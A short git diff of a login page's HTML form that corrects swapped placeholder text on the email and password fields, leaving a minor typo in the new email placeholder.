--- a/login.html
+++ b/login.html
@@ -19,9 +19,9 @@
       <form onsubmit="sendEmail();reset();return false">
         
         <label>Email</label>
-        <input id="email" type="email" placeholder="Enter your password" />
+        <input id="email" type="email" placeholder="Enter yourEmail" />
         <label>Password</label>
-        <input type="password" placeholder="Enter your email" />
+        <input type="password" placeholder="Enter your password" />
         <p><a id="cer" href="#">forgotpassword? </a></p>
         
         <button id="huu">Log in</button>
